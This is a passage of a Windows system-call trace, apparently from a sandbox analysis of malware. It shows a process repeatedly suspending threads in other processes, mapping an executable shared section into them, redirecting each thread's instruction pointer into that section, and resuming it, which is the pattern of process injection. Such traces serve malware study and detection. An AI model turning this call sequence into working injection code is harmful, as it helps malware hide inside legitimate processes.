[443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.888] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0139.888] NtClose (Handle=0x1a0) returned 0x0 [0139.888] NtClose (Handle=0x1a4) returned 0x0 [0139.889] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x11cc, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0139.889] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0139.889] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0139.890] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x27f000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0139.890] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0139.892] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x11d0) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0139.892] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0139.892] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x20d0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0139.919] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x4fff14, Ebx=0x27f000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x4ffebc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x4ffea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.921] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0139.921] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xc4200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0xc5000) returned 0x0 [0139.927] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xc4200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x500000, SectionOffset=0x0, ViewSize=0xde6e8*=0xc5000) returned 0x0 [0139.946] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0139.949] NtClose (Handle=0x1a8) returned 0x0 [0139.949] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x4fff14, Ebx=0x27f000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x4ffebc, Eip=0x531717, SegCs=0x23, EFlags=0x202, Esp=0x4ffea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.062] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0140.063] NtClose (Handle=0x1a4) returned 0x0 [0140.063] NtClose (Handle=0x1a0) returned 0x0 [0140.064] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x11d4, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0140.064] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0140.064] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0140.064] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x35f000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0140.064] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0140.131] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x11d8) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0140.131] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0140.131] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x21c0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0140.141] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x35f000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, 